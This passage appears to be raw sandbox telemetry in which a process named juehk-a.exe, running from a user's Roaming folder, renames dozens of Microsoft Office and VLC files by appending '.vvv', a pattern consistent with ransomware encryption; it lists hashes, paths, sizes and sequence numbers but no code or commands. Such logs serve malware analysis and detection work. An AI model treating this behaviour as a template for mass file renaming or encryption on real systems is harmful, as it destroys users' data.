- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\MEDIA\DefaultHold.wma
- new_name: C:\Program Files\Microsoft Office\Office15\MEDIA\DefaultHold.wma.vvv
- ads:
- fid (ads:): 562949953498597
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102910
- mode: rename
- sequenceNumber: 2376
- filesize: 85598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Model.zip
- new_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Model.zip.vvv
- ads:
- fid (ads:): 562949953498554
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102923
- mode: rename
- sequenceNumber: 2377
- filesize: 29230
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.Controls.zip
- new_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.Controls.zip.vvv
- ads:
- fid (ads:): 562949953498555
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102948
- mode: rename
- sequenceNumber: 2378
- filesize: 70958
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.zip
- new_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.zip.vvv
- ads:
- fid (ads:): 562949953498556
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103092
- mode: rename
- sequenceNumber: 2379
- filesize: 82414
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Ocomprivate.zip
- new_name: C:\Program Files\Microsoft Office\Office15\Ocomprivate.zip.vvv
- ads:
- fid (ads:): 562949953498567
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103433
- mode: rename
- sequenceNumber: 2380
- filesize: 119214
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\SAMPLES\SOLVSAMP.XLS
- new_name: C:\Program Files\Microsoft Office\Office15\SAMPLES\SOLVSAMP.XLS.vvv
- ads:
- fid (ads:): 562949953496322
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103469
- mode: rename
- sequenceNumber: 2381
- filesize: 11950
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\System.Windows.Controls.Theming.Toolkit.zip
- new_name: C:\Program Files\Microsoft Office\Office15\System.Windows.Controls.Theming.Toolkit.zip.vvv
- ads:
- fid (ads:): 562949953498637
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103509
- mode: rename
- sequenceNumber: 2382
- filesize: 3374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG
- new_name: C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.vvv
- ads:
- fid (ads:): 562949953496858
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103694
- mode: rename
- sequenceNumber: 2383
- filesize: 4398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG
- new_name: C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG.vvv
- ads:
- fid (ads:): 562949953496897
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103722
- mode: rename
- sequenceNumber: 2384
- filesize: 6702
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG
- new_name: C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG.vvv
- ads:
- fid (ads:): 562949953496938
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 103992
- mode: rename
- sequenceNumber: 2385
- filesize: 16750
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\AUTHORS.txt
- new_name: C:\Program Files\VideoLAN\VLC\AUTHORS.txt.vvv
- ads:
- fid (ads:): 1125899906934893
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104019
- mode: rename
- sequenceNumber: 2386
- filesize: 18846
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\COPYING.txt
- new_name: C:\Program Files\VideoLAN\VLC\COPYING.txt.vvv
- ads:
- fid (ads:): 1407374883645550
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104538
- mode: rename
- sequenceNumber: 2387
- filesize: 4222
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\main.css
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\main.css.vvv
- ads:
- fid (ads:): 562949953517667
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104549
- mode: rename
- sequenceNumber: 2388
- filesize: 3150
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css.vvv
- ads:
- fid (ads:): 562949953517668
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104565
- mode: rename
- sequenceNumber: 2389
- filesize: 622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.vvv
- ads:
- fid (ads:): 562949953517672
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104578
- mode: rename
- sequenceNumber: 2390
- filesize: 622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png.vvv
- ads:
- fid (ads:): 562949953517673
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104592
- mode: rename
- sequenceNumber: 2391
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.vvv
- ads:
- fid (ads:): 562949953517674
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104607
- mode: rename
- sequenceNumber: 2392
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.vvv
- ads:
- fid (ads:): 562949953517675
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104617
- mode: rename
- sequenceNumber: 2393
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.vvv
- ads:
- fid (ads:): 562949953517676
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104627
- mode: rename
- sequenceNumber: 2394
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.vvv
- ads:
- fid (ads:): 562949953517677
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104636
- mode: rename
- sequenceNumber: 2395
- filesize: 3054
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.vvv
- ads:
- fid (ads:): 562949953517678
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104646
- mode: rename
- sequenceNumber: 2396
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.vvv
- ads:
- fid (ads:): 562949953517679
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104657
- mode: rename
- sequenceNumber: 2397
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png.vvv
- ads:
- fid (ads:): 562949953517680
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104667
- mode: rename
- sequenceNumber: 2398
- filesize: 4622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.vvv
- ads:
- fid (ads:): 562949953517681
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104676
- mode: rename
- sequenceNumber: 2399
- filesize: 5518
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.vvv
- ads:
- fid (ads:): 562949953517682
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104687
- mode: rename
- sequenceNumber: 2400
- filesize: 4622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png.vvv
- ads:
- fid (ads:): 562949953517683
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104701
- mode: rename
- sequenceNumber: 2401
- filesize: 4622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.vvv
- ads:
- fid (ads:): 562949953517684
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104720
- mode: rename
- sequenceNumber: 2402
- filesize: 4622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.vvv
- ads:
- fid (ads:): 562949953517685
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104734
- mode: rename
- sequenceNumber: 2403
- filesize: 33998
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css.vvv
- ads:
- fid (ads:): 562949953517670
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104784
- mode: rename
- sequenceNumber: 2404
- filesize: 5102
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.vvv
- ads:
- fid (ads:): 562949953517705
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104818
- mode: rename
- sequenceNumber: 2405
- filesize: 2446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.vvv
- ads:
- fid (ads:): 562949953517706
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104873
- mode: rename
- sequenceNumber: 2406
- filesize: 12382
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.vvv
- ads:
- fid (ads:): 562949953517710
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 104953
- mode: rename
- sequenceNumber: 2407
- filesize: 1774
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.vvv
- ads:
- fid (ads:): 562949953517707
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105029
- mode: rename
- sequenceNumber: 2408
- filesize: 3342
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.vvv
- ads:
- fid (ads:): 562949953517708
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105049
- mode: rename
- sequenceNumber: 2409
- filesize: 1358
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.vvv
- ads:
- fid (ads:): 562949953517711
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105065
- mode: rename
- sequenceNumber: 2410
- filesize: 5534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.vvv
- ads:
- fid (ads:): 562949953517709
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105077
- mode: rename
- sequenceNumber: 2411
- filesize: 16302
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.vvv
- ads:
- fid (ads:): 562949953517712
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105087
- mode: rename
- sequenceNumber: 2412
- filesize: 1022
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.vvv
- ads:
- fid (ads:): 562949953517713
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105108
- mode: rename
- sequenceNumber: 2413
- filesize: 5582
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\common.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\common.js.vvv
- ads:
- fid (ads:): 562949953517715
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105118
- mode: rename
- sequenceNumber: 2414
- filesize: 24398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\controlers.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\controlers.js.vvv
- ads:
- fid (ads:): 562949953517716
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105128
- mode: rename
- sequenceNumber: 2415
- filesize: 87518
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-1.5.1.min.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-1.5.1.min.js.vvv
- ads:
- fid (ads:): 562949953517717
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105144
- mode: rename
- sequenceNumber: 2416
- filesize: 213166
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-ui-1.8.13.custom.min.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-ui-1.8.13.custom.min.js.vvv
- ads:
- fid (ads:): 562949953517718
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105156
- mode: rename
- sequenceNumber: 2417
- filesize: 184878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js.vvv
- ads:
- fid (ads:): 562949953517719
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105167
- mode: rename
- sequenceNumber: 2418
- filesize: 4462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js.vvv
- ads:
- fid (ads:): 562949953517720
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105202
- mode: rename
- sequenceNumber: 2419
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete.png.vvv
- ads:
- fid (ads:): 562949953517724
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105210
- mode: rename
- sequenceNumber: 2420
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete_small.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete_small.png.vvv
- ads:
- fid (ads:): 562949953517725
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105221
- mode: rename
- sequenceNumber: 2421
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\eject.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\eject.png.vvv
- ads:
- fid (ads:): 562949953517726
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105230
- mode: rename
- sequenceNumber: 2422
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\empty.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\empty.png.vvv
- ads:
- fid (ads:): 562949953517727
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105240
- mode: rename
- sequenceNumber: 2423
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\fullscreen.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\fullscreen.png.vvv
- ads:
- fid (ads:): 562949953517728
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105250
- mode: rename
- sequenceNumber: 2424
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\help.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\help.png.vvv
- ads:
- fid (ads:): 562949953517729
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105259
- mode: rename
- sequenceNumber: 2425
- filesize: 558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\info.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\info.png.vvv
- ads:
- fid (ads:): 562949953517730
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105270
- mode: rename
- sequenceNumber: 2426
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\loop.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\loop.png.vvv
- ads:
- fid (ads:): 562949953517731
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105279
- mode: rename
- sequenceNumber: 2427
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\minus.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\minus.png.vvv
- ads:
- fid (ads:): 562949953517732
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105293
- mode: rename
- sequenceNumber: 2428
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\next.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\next.png.vvv
- ads:
- fid (ads:): 562949953517733
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105298
- mode: rename
- sequenceNumber: 2429
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\pause.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\pause.png.vvv
- ads:
- fid (ads:): 562949953517734
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105306
- mode: rename
- sequenceNumber: 2430
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\play.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\play.png.vvv
- ads:
- fid (ads:): 562949953517735
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105315
- mode: rename
- sequenceNumber: 2431
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist.png.vvv
- ads:
- fid (ads:): 562949953517736
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105323
- mode: rename
- sequenceNumber: 2432
- filesize: 510
- processinfo:
